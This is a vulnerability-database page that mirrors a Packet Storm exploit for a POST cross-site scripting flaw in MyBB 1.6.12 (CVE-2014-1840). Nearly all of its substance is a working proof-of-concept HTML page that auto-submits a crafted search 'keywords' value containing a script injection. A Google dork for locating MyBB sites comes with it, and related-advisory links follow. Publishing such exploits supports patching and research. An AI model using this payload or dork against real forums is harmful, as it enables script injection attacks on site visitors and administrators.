Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormOsanda MalithPACKETSTORM:125038
HistoryFeb 03, 2014 - 12:00 a.m.

MyBB 1.6.12 POST Cross Site Scripting

2014-02-0300:00:00
Osanda Malith
packetstormsecurity.com
30

EPSS

0.002

Percentile

52.5%

JSON
`<html>  
<!--  
Exploit-Title: MyBB 1.6.12 POST XSS 0day  
Google-Dork: inurl:index.php intext:Powered By MyBB  
Date: Februrary 2nd of 2014  
Bug Discovered and Exploit Author: Osanda Malith Jayathissa  
Vendor Homepage: http://www.mybb.com  
Software Link: http://resources.mybb.com/downloads/mybb_1612.zip  
Version: 1.6.12 (older versions might be vulnerbale)  
Tested on: Windows 8 64-bit  
Video: https://www.youtube.com/watch?v=67MfgixmWgo  
Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day  
CVE: CVE-2014-1840  
-->  
<body>  
<form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST">  
<input type="hidden" name="action" value="do_search" />  
<input type="hidden" name="keywords"  
  
value="qor'("\2a<script>alert(/XSS/)</script>  
  
" />  
<script>document.exploit.submit(); </script>  
</form>  
</body>  
</html>  
  
`

Related

nessus 1
cvelist 1
seebug 1
cve 1
openvas 1
prion 1
nvd 1
nessus
nessus
MyBB < 1.6.13 Multiple Vulnerabilities
2015-01-22 00:00:00
cvelist
cvelist
CVE-2014-1840
2014-03-03 16:00:00
seebug
seebug
MyBB 'search.php'跨站脚本漏洞
2014-02-20 00:00:00
cve
cve
CVE-2014-1840
2014-03-03 16:55:04
openvas
openvas
MyBB keywords Cross Site Scripting Vulnerability
2014-02-05 00:00:00
prion
prion
Cross site scripting
2014-03-03 16:55:00
nvd
nvd
CVE-2014-1840
2014-03-03 16:55:04

EPSS

0.002

Percentile

52.5%

JSON
Related for PACKETSTORM:125038
nessus1cvelist1seebug1cve1openvas1prion1nvd1